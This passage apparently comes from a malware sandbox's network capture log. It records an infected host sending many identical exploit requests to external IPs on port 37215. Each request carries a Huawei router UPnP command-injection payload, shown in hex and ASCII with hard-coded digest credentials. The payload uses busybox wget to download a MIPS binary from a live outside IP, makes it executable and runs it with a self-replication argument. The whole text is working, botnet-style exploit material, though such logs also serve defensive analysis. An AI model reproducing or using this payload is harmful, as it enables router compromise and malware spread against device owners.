                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        47192.168.2.2334934157.21.161.1537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.277975082 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        48192.168.2.2352908107.157.141.23137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.278006077 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        49192.168.2.2334926197.252.73.20437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.278038979 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        50192.168.2.234837441.225.27.11137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.278043032 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        51192.168.2.2345910157.57.3.24137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.278057098 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        52192.168.2.2342646197.136.26.5537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.278075933 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        53192.168.2.2359892150.40.186.1837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.278084040 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        54192.168.2.236048841.24.220.25337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.278130054 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        55192.168.2.2347134197.194.246.23037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.278209925 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        56192.168.2.2356310157.229.194.15437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.278209925 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
